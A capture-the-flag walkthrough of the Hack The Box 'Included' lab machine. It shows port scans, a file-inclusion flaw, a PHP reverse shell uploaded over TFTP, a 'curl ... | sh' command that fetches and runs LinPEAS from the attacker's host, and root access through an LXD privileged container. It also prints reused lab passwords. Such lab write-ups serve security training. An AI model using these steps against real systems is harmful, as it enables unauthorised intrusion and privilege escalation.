Included Walkthrough
After the Pathfinder Walkthrough, Here I'm with Included, so... let's hack and grab the flags.
As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box, first of all you must have a complete Pathfinder machine.
Enough talks, 🥱 Let’s Get It Started 🐱💻
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱👤
00. Start Machine …
To start machine, just click "Join Machine".
Then you can see the IP address for that machine. Usually it is 10.10.10.55 🤠
Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! 🙂
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# ping 10.10.10.55 -c 2
PING 10.10.10.55 (10.10.10.55) 56(84) bytes of data.
64 bytes from 10.10.10.55: icmp_seq=1 ttl=63 time=297 ms
64 bytes from 10.10.10.55: icmp_seq=2 ttl=63 time=321 ms
--- 10.10.10.55 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 296.954/308.942/320.931/11.988 ms01. Enumeration First …
01.1 Fast ports scan
As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable networkHere is the output 👇
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:26 EDT
Initiating Ping Scan at 13:26
Scanning 10.10.10.55 [4 ports]
Completed Ping Scan at 13:26, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:26
Scanning 10.10.10.55 [65535 ports]
Discovered open port 80/tcp on 10.10.10.55
SYN Stealth Scan Timing: About 47.58% done; ETC: 13:28 (0:00:34 remaining)
Completed SYN Stealth Scan at 13:28, 64.20s elapsed (65535 total ports)
Nmap scan report for 10.10.10.55
Host is up, received reset ttl 63 (0.22s latency).
Scanned at 2021-05-24 13:26:58 EDT for 65s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 64.72 seconds
Raw packets sent: 79376 (3.493MB) | Rcvd: 78517 (3.141MB)So again we have only port 80 open.
01.2 Run Nmap Scripting Engine
To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 80 10.10.10.55 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 13:29 EDT
Nmap scan report for 10.10.10.55
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 secondsWe have only port 80 open here. Now you know what is next..
01.3 Discover more on port 80
Let's open web browser and check what is inside the port 80.
By looking at the URL, we can assume that we have some Directory Traversal vulnerability here. So let's check it.
We can easily check this using burp suite repeater tab. Let's power up burp suite and navigate to the site again.
As you can see we have Directory Traversal vulnerability. If we can upload any reverse shell script, we can call that file and get success by using this vulnerability. But do how we upload the reverse shell file? I tried so hard to find a way but I could not. 😥😥
Then I looked deeply at all the users which were available in the /etc/passwd using directory traversal vulnerability. You know what I found there? There is a user also in TFTP . Wait what.. How did we miss that port? 🤔🤔 Oh shoot! It's running on UDP port 69.
Let's run Nmap again and check whether that port is alive.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# nmap -sU -p69 10.10.10.55
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 15:17 EDT
Nmap scan report for 10.10.10.55
Host is up (0.31s latency).
PORT STATE SERVICE
69/udp open|filtered tftp
Nmap done: 1 IP address (1 host up) scanned in 3.67 secondsYay!! It's alive. Let's try to connect to that service.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> ?
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help informationYes we can connect to that service and also we can upload any file using that service. Now we have an idea 💡💡. But how do I know the exact path where that file was stored in?
Again we can check that /etc/passwd file to get an idea about the home directory.
Fine! Now we know where my file will be located after I uploaded it to the TFTP.😋😋
02. Foothold
First we need to create PHP Reverse Shell. We can simply copy it from our kali webshell directory or using this site.
After editing the above sections you can copy that part of the code and paste it into the file.
Now, let's use TFTP and upload that file. Use put command to upload the file.
┌──(root💀hidd3nwiki)-[StartingPoints/Included]
└─# tftp 10.10.10.55
tftp> put hidd3nwiki.php 👈
Sent 2708 bytes in 2.2 secondsThen let's fire up netcat listener and check that file using Directory Traversal vulnerability. The path to file location will be /var/lib/tftpboot/filename.php
We successfully landed a reverse shell as www-data, it's good spawn a TTY shell.
python3 -c "import pty; pty.spawn('/bin/bash')"If you look around the /home directory, we have a user called mike. Since all these boxes are connected together, [I mean, passwords are reused] we can check using the passwords we found on Pathfinder walkthrough. Let's try to su mike
Yes! It was successful and we can grab the user flag using Sheffield19 Password. Now it's time to root flag. 😎😎
03. Privilege Escalation
When it comes to privilege escalations, we can manually check one by one or we can simply run any automation script to do the searching for us. Since this box is the Linux box we can use LinPEAS .
First we need to copy that script to our machine.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.shThen we can run python demon server to host that file from our end.
┌──(root💀hidd3nwiki)-[/home/…/Documents/HackTheBox/StartingPoints/Included]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...Now we can use wget command to download that file to the Included box. But here, I'm not going to download it and run. Instead of that I use curl command to run that file directly.
curl http://<YourIP>:8000/inpeas.sh | sh 
We can identify interesting stuff by looking at the output file. 👇
As you can see the mike user is in the LXD group. LXD group is a high-privileged group in Linux system.
Here I found lxd/lxc Group - Privilege escalation script from hacktricks. And I'm going to go through the second method in that article.
First, Try to clone the following repository to your host and build an alpine image.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
After you executed the build-alpine file, a tar.gx file should be created. File name will be different from my one.
Now we can upload it into the server by using python demon web server and download it through wget.
Now follow the article again. The following command will import the image and create privileged container with it.
lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=trueNext we need to mount the /root into the image.
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=trueNow Let's interact with the container.
lxc start mycontainer
lxc exec mycontainer /bin/sh
As you can see, we have landed on to the root shell. Now we can grab the root.txt file. It's located at /mnt/root/root/
04. Post Exploitation
As you can see there is a login.sql file in the /mnt/root/root directory. Let's open it.
And it reveals credentials. Daniel : SNDv*2wzLWf
Okay... I’ll see you on the next box! 🙋♂️🙋♂️
Find me on @twitter
Last updated
Was this helpful?